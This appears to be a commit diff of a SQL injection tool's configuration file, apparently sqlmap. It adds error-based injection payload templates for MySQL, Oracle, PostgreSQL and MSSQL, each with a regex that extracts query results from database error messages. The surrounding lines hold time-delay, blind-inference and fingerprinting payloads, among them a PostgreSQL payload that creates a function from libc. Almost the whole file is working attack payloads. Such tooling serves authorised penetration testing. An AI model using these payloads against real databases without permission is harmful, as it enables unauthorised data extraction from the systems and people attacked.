|
24 | 24 | <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/> |
25 | 25 | <substring query="MID((%s), %d, %d)"/> |
26 | 26 | <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> |
| 27 | + <error query="AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((%s),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" regex="SQL error:.*Duplicate entry '(?P<result>.+)' for key"/> |
27 | 28 | <inference query="AND ORD(MID((%s), %d, 1)) > %d"/> |
28 | 29 | <banner query="SELECT VERSION()"/> |
29 | 30 | <current_user query="SELECT CURRENT_USER()"/> |
|
90 | 91 | <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/> |
91 | 92 | <substring query="SUBSTR((%s), %d, %d)"/> |
92 | 93 | <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/> |
| 94 | + <error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(58)||CHR(58)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P<result>.+)::"/> |
93 | 95 | <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/> |
94 | 96 | <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/> |
95 | 97 | <current_user query="SELECT USER FROM DUAL"/> |
|
173 | 175 | <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/> |
174 | 176 | <substring query="SUBSTR((%s)::text, %d, %d)"/> |
175 | 177 | <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> |
| 178 | + <error query="AND 1=CAST((%s)::text AS NUMERIC)" regex="SQL error:.*invalid input syntax for type numeric:.*"(?P<result>.+)""/> |
176 | 179 | <inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/> |
177 | 180 | <banner query="SELECT VERSION()"/> |
178 | 181 | <current_user query="SELECT CURRENT_USER"/> |
|
239 | 242 | <timedelay query="WAITFOR DELAY '0:0:%d'"/> |
240 | 243 | <substring query="SUBSTRING((%s), %d, %d)"/> |
241 | 244 | <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/> |
| 245 | + <error query="AND 1=CONVERT(INT,(%s))" regex="Conversion failed when converting.*'(?P<result>.+)' to data type int"/> |
242 | 246 | <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/> |
243 | 247 | <banner query="SELECT @@VERSION"/> |
244 | 248 | <current_user query="SELECT SYSTEM_USER"/> |
|
0 commit comments